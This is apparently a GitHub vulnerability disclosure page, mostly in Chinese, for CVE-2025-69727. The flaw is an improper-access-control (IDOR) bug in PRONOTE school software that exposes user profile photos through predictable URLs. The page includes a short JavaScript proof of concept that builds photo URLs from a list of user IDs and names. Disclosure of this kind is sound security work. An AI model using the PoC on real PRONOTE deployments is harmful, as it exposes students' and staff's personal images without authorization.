0xZeroSec/CVE-2025-69727
GitHub: 0xZeroSec/CVE-2025-69727
针对CVE-2025-69727漏洞的占位仓库,暂无实质性技术内容。
Stars: 2 | Forks: 0
# CVE-2025-69727
### 产品供应商
[INDEX-EDUCATION](https://www.index-education.com/fr/)
### 受影响的产品代码库
PRONOTE - 202X.X.X < 2025.2.8
### 漏洞描述
INDEX-EDUCATION PRONOTE 在 2025.2.8 版本之前存在一个不正确的访问控制漏洞。受影响的组件(``composeUrlImgPhotoIndividu``)允许仅基于用户 ID 和用户名等可预测的标识符来构造指向用户头像的直接 URL。由于在生成或访问这些 URL 时缺少授权检查和速率限制,未经身份验证或未经授权的攻击者可能会通过构造带有猜测或已知标识符的请求来获取用户的个人资料图片。
### PoC
```
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});
```
### 发现者
- [raphckrman](https://github.com/raphckrman)
- [GameCreep35](https://github.com/iGameCreep)
标签:CISA项目, CMS安全, IDOR, JavaScript, Maven, PoC, Web安全, 数据泄露, 暴力破解, 未授权访问, 漏洞验证, 蓝队分析